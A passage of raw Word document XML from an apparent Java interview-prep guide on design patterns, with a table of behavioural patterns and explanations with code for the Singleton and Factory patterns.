          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4EE7765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0B47E4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access elements sequentially without exposing the structure.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="7C7224A2" w14:textId="77777777" w:rsidTr="00147AB8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4BF8F5D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28FC91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the program skeleton, deferring some steps to subclasses.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="5EB52FB8" w14:textId="77777777" w:rsidTr="00147AB8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="41F45FC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570B11C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alter its behavior when its internal state changes.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="2F62AED0" w14:textId="77777777" w:rsidTr="00147AB8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="67F4836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2A62E7C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until it is handled.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="0465BF6B" w14:textId="77777777" w:rsidTr="00147AB8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="77D91C2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F1A060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object that centralizes complex communications between objects.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="74D2EB93" w14:textId="77777777" w:rsidTr="00147AB8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E6D17E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4A3BD7C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d restores an object’s internal state without violating encapsulation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="035C5689" w14:textId="77777777" w:rsidTr="00147AB8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5AA45C4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6E746BE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a grammar for a language as a class hierarchy.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="1AC38CC9" w14:textId="77777777" w:rsidTr="00147AB8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0870828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5F4CA785"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dding new operations to existing object structures.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5AFCAAF9"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0BA8D8">
          <v:rect id="_x0000_i2008" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A37F5E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Singleton Pattern (Creational)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE0E0B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311A228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52AC530A" w14:textId="77777777" w:rsidR="00147AB8" w:rsidRPr="00FE4147" w:rsidRDefault="00147AB8" w:rsidP="00FE4147">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37FA7BF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 // private constructor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F72FB64" w14:textId="77777777" w:rsidR="00147AB8" w:rsidRPr="00FE4147" w:rsidRDefault="00147AB8" w:rsidP="00FE4147">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1922EF7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C4879C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if (instance == null) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3375665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39E412B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DAEBAA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333BF0D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D931CE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67D0A7E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w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>language-independent</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and enhance code </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reus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readability</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maintainability</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0ADDBF" w14:textId="713F7530"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2009" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D988C6" w14:textId="77777777" w:rsidR="00C6064A" w:rsidRPr="00CE4B95" w:rsidRDefault="00C6064A" w:rsidP="00C6064A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="431" w:name="_Toc197867645"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the singleton design pattern? Explain it?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="431"/>
    </w:p>
    <w:p w14:paraId="77237585" w14:textId="159C2A05" w:rsidR="005E4D47" w:rsidRPr="00FE4147" w:rsidRDefault="005E4D47"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 Design Pattern</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ensures that </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>only one instance</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of a class is created and provides a </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>global access point</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to that instance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26605A8A"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0FEA8">
          <v:rect id="_x0000_i2010" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="597E3746"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Features:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1B5BC9"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ivate constructor</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Prevents instantiation from other classes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669D0250"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ic instance</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Holds the one and only instance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306E9E2A"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ublic static method</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Provides global access to the instance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB688B4"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611AD">
          <v:rect id="_x0000_i2011" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA713E4"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33B2FC01"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ogging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747A7499"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atabase connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D8014E"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figuration classes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B6BA38"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read pools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A12C89D"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0FEDA">
          <v:rect id="_x0000_i2012" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA719CF"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Lazy Initialization Example in Java:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E95EDD2"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78D1600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135E35CE" w14:textId="77777777" w:rsidR="005E4D47" w:rsidRPr="00FE4147" w:rsidRDefault="005E4D47" w:rsidP="00FE4147">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2042CF1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ivate constructor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E107CF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19975CD0" w14:textId="77777777" w:rsidR="005E4D47" w:rsidRPr="00FE4147" w:rsidRDefault="005E4D47" w:rsidP="00FE4147">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5ED050C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ublic access method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B8E658"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869B34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3A10A28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 // create instance if not exists</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B391F04"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967B8D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2B2AE88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8271D0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F9209F5"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D0CF">
          <v:rect id="_x0000_i2013" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2094E97A"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hread-Safe Singleton (with synchronized block):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BCDAF5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6CCC2AB1"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6F8EA7D5" w14:textId="77777777" w:rsidR="005E4D47" w:rsidRPr="00FE4147" w:rsidRDefault="005E4D47" w:rsidP="00FE4147">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EC986F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244CBEC7" w14:textId="77777777" w:rsidR="005E4D47" w:rsidRPr="00FE4147" w:rsidRDefault="005E4D47" w:rsidP="00FE4147">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F3F9F7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36D5D43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443B84C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nchronized(Singleton.class) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6243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66CEEF93"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2BC9C2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642271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2E3165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CDCF83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042B7CC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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135E7825"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A33F078"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03FFB">
          <v:rect id="_x0000_i2014" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="259CFAF2"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1253D71B"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trolled access to sole instance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356FDB56"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shared instance).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3E3262"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voids redundant object creation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301F9FA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Singleton is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>creational pattern</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> used when exactly </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>one object is needed across the system</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563A605F" w14:textId="15546BED"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15" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6EF312" w14:textId="50A7B51B" w:rsidR="000D56E3" w:rsidRPr="00CE4B95" w:rsidRDefault="009C5C19">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="432" w:name="_Toc197867646"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain Factory design pattern</w:t>
      </w:r>
      <w:r w:rsidR="000D56E3" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="432"/>
    </w:p>
    <w:p w14:paraId="79EACBD6" w14:textId="024065BC" w:rsidR="008C6494" w:rsidRPr="00FE4147" w:rsidRDefault="008C6494"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creational design pattern</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that provides an interface for creating objects but </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>lets subclasses decide</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> which class to instantiate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9ACCA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t promotes </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>loose coupling</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> by removing the instantiation logic from the client code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30AACD1C"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18E35">
          <v:rect id="_x0000_i2016" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="238B70DB"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3775588D"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 an interface or abstract class for creating an object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD2EEA4"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classes or a separate factory class decide which class to instantiate based on input.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5619E61D"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93B40">
          <v:rect id="_x0000_i2017" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9DCCE3"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C9FEF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hen the object creation is complex or dependent on conditions, and you don’t want the client to deal with object creation logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A468BFE"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9308B3">
          <v:rect id="_x0000_i2018" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F754F56"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life Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02717BB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hapeFactory creates different Shape objects like Circle, Rectangle, etc., based on input.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A33367"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C19E02">
          <v:rect id="_x0000_i2019" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF7EB28"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Code Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B054E39"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Interface:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5596C1B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hape {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1393521E"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raw();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C2164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1DE53CD"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Implementations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5941B26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Circle implements Shape {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48668FA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21A10EB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Circle");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABF878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0BE6310"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2EB38AE" w14:textId="77777777" w:rsidR="008C6494" w:rsidRPr="00FE4147" w:rsidRDefault="008C6494" w:rsidP="00FE4147">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14EA12D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Rectangle implements Shape {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E1EC0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60295157"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Rectangle");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C224D7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B01FC4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63754C1"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Factory Class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23BB55B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hapeFactory {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D4330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hape getShape(String type) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB5B249"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 == null) return null;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44857D3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CIRCLE")) return new Circle();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5020EFD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RECTANGLE")) return new Rectangle();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9DA43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null;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB1595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BC975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0071524"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lient Code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC2B77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2B04D1E1"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72F47E6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Factory factory = new ShapeFactory();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A305B3" w14:textId="77777777" w:rsidR="008C6494" w:rsidRPr="00FE4147" w:rsidRDefault="008C6494" w:rsidP="00FE4147">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="111E5F4C"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1 = factory.getShape("CIRCLE");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553AB41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1.draw();  // Output: Drawing Circle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481B82CA" w14:textId="77777777" w:rsidR="008C6494" w:rsidRPr="00FE4147" w:rsidRDefault="008C6494" w:rsidP="00FE4147">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62754E3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2 = factory.getShape("RECTANGLE");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4946246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2.draw();  // Output: Drawing Rectangle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EEE1B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15573E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64C69FF"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8A8B">
          <v:rect id="_x0000_i2020" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8AFF87"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Advantages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B79B81B"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Hides object creation logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4798CA63"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sier to introduce new classes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9904FE"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Promotes loose coupling and adherence to </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Open/Closed Principle</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4861539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Factory Pattern is ideal when a system needs to </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>delegate the responsibility of object instantiation</w:t>
      </w:r>
